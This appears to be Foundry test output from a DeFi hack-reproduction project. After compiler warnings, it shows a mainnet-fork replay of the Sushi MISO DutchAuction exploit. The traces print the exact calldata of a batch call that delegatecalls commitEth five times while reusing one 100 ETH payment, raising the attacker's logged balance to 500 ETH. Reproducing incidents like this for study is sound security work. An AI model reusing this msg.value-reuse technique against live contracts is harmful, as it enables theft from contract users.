Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.20s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2021-09/Sushimiso_exp.sol:22:5:
   |
22 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 899.25ms (4.38ms CPU time)

Ran 1 test for src/test/2021-09/Sushimiso_exp.sol:ContractTest
[PASS] testExploit() (gas: 596246)
Logs:
  Before exploit, ETH balance of attacker:: 100000000000000000000
  Before exploit, ETH balance of DutchAuction:: 112666020243246720000000
  After exploit, ETH balance of attacker:: 500000000000000000000
  After exploit, ETH balance of DutchAuction:: 112266020243246720000000

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 13038771 [1.303e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [596246] ContractTest::testExploit()
    ├─ [0] 0x0000000000000000000000000000000000000000::fallback{value: 79228162414264337593543950335}()
    │   └─ ← [Stop]
    ├─ emit log_named_uint(key: "Before exploit, ETH balance of attacker:", val: 100000000000000000000 [1e20])
    ├─ emit log_named_uint(key: "Before exploit, ETH balance of DutchAuction:", val: 112666020243246720000000 [1.126e23])
    ├─ [80471] 0x4c4564a1FE775D97297F9e3Dc2e762e0Ed5Dda0e::batch{value: 100000000000000000000}([0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001], true)
    │   ├─ [77582] 0x364B7E2d5B11b9D2016D232fA271D89d5E6065f1::batch{value: 100000000000000000000}([0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001, 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000001], true) [delegatecall]
    │   │   ├─ [20320] 0x4c4564a1FE775D97297F9e3Dc2e762e0Ed5Dda0e::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   ├─ [20145] 0x364B7E2d5B11b9D2016D232fA271D89d5E6065f1::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   │   ├─ [55] ContractTest::receive{value: 100000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [12320] 0x4c4564a1FE775D97297F9e3Dc2e762e0Ed5Dda0e::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   ├─ [12145] 0x364B7E2d5B11b9D2016D232fA271D89d5E6065f1::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   │   ├─ [55] ContractTest::receive{value: 100000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [12320] 0x4c4564a1FE775D97297F9e3Dc2e762e0Ed5Dda0e::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   ├─ [12145] 0x364B7E2d5B11b9D2016D232fA271D89d5E6065f1::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   │   ├─ [55] ContractTest::receive{value: 100000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [12320] 0x4c4564a1FE775D97297F9e3Dc2e762e0Ed5Dda0e::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   ├─ [12145] 0x364B7E2d5B11b9D2016D232fA271D89d5E6065f1::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   │   ├─ [55] ContractTest::receive{value: 100000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   ├─ [12320] 0x4c4564a1FE775D97297F9e3Dc2e762e0Ed5Dda0e::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   ├─ [12145] 0x364B7E2d5B11b9D2016D232fA271D89d5E6065f1::commitEth{value: 100000000000000000000}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true) [delegatecall]
    │   │   │   │   ├─ [55] ContractTest::receive{value: 100000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return]
    │   │   └─ ← [Return] [true, true, true, true, true], [0x, 0x, 0x, 0x, 0x]
    │   └─ ← [Return] [true, true, true, true, true], [0x, 0x, 0x, 0x, 0x]
    ├─ emit log_named_uint(key: "After exploit, ETH balance of attacker:", val: 500000000000000000000 [5e20])
    ├─ emit log_named_uint(key: "After exploit, ETH balance of DutchAuction:", val: 112266020243246720000000 [1.122e23])
    ├─  storage changes:
    │   @ 0x3a6357012c1a3ae0a17d304c9920310382d968ebcc4b1771f41c6b304205b573: 0 → 137
    │   @ 0xb744f0178cd8c2607b443ddc54a205a59d80b6000e7a4efc8350c5e51b2c7140: 0 → 0x2b3e149600000000000000000000000000000000000000000000000000000000
    │   @ 0xc5141b64ffd77965a5c13f305e9c0f6379d36bd6b8a3082cd3a7aba042e1572a: 0 → 0x2b3e149600000000000000000000000000000000000000000000000000000000
    │   @ 0xb45100b9a64fd623763f110cbcb70728a7411866226fb7e2292bb3585e6f8fb3: 0 → 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d6
    │   @ 0x7e940ef4d7f8bcc2e4223bb18c35db83728b82caefeb76a348190bd0407f99c5: 0 → 0x2b3e149600000000000000000000000000000000000000000000000000000000
    │   @ 0x3a6357012c1a3ae0a17d304c9920310382d968ebcc4b1771f41c6b304205b574: 0 → 137
    │   @ 0x3a6357012c1a3ae0a17d304c9920310382d968ebcc4b1771f41c6b304205b572: 0 → 137
    │   @ 0xb45100b9a64fd623763f110cbcb70728a7411866226fb7e2292bb3585e6f8fb4: 0 → 0x2b3e149600000000000000000000000000000000000000000000000000000000
    │   @ 33: 0 → 5
    │   @ 0xc5141b64ffd77965a5c13f305e9c0f6379d36bd6b8a3082cd3a7aba042e15729: 0 → 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d6
    │   @ 0xb744f0178cd8c2607b443ddc54a205a59d80b6000e7a4efc8350c5e51b2c7141: 0 → 0x0000000100000000000000000000000000000000000000000000000000000000
    │   @ 0x4e77318fc96ef89f2f80f75a1721d90df31dd9a20287e446768f0b69f70368f7: 0 → 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d6
    │   @ 0xb45100b9a64fd623763f110cbcb70728a7411866226fb7e2292bb3585e6f8fb5: 0 → 0x0000000100000000000000000000000000000000000000000000000000000000
    │   @ 0x4e77318fc96ef89f2f80f75a1721d90df31dd9a20287e446768f0b69f70368f8: 0 → 0x2b3e149600000000000000000000000000000000000000000000000000000000
    │   @ 0x3a6357012c1a3ae0a17d304c9920310382d968ebcc4b1771f41c6b304205b570: 0 → 137
    │   @ 0xc5141b64ffd77965a5c13f305e9c0f6379d36bd6b8a3082cd3a7aba042e1572b: 0 → 0x0000000100000000000000000000000000000000000000000000000000000000
    │   @ 0xb744f0178cd8c2607b443ddc54a205a59d80b6000e7a4efc8350c5e51b2c713f: 0 → 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d6
    │   @ 0x3a6357012c1a3ae0a17d304c9920310382d968ebcc4b1771f41c6b304205b571: 0 → 137
    │   @ 0x4e77318fc96ef89f2f80f75a1721d90df31dd9a20287e446768f0b69f70368f9: 0 → 0x0000000100000000000000000000000000000000000000000000000000000000
    │   @ 0x7e940ef4d7f8bcc2e4223bb18c35db83728b82caefeb76a348190bd0407f99c4: 0 → 0x297629600000000000000000000000007fa9385be102ac3eac297483dd6233d6
    │   @ 0x7e940ef4d7f8bcc2e4223bb18c35db83728b82caefeb76a348190bd0407f99c6: 0 → 0x0000000100000000000000000000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.14s (6.43s CPU time)

Ran 2 test suites in 9.16s (10.04s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
